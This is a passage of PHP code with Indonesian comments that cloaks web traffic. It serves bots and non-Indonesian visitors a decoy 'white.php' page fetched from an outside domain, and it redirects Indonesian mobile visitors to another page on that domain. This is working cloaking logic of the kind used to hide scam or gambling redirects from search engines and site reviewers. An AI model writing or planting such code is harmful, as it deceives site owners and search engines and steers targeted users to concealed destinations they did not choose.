isMobile(); // Log jika IP-API gagal if (!$country) { error_log("Gagal deteksi lokasi untuk IP: $ip"); $country = 'UNKNOWN'; } if ($isBot || $country !== 'Indonesia') { $page = @file_get_contents('https://berita-terkini.id/pps/white.php') ?: 'Gagal load white.php'; echo $page; ob_end_flush(); exit(); } if ($isMobile && $country === 'Indonesia') { header("Location: https://berita-terkini.id/pps/"); exit(); } $page = @file_get_contents('https://berita-terkini.id/pps/white.php') ?: 'Gagal load white.php'; echo $page; ob_end_flush(); ?>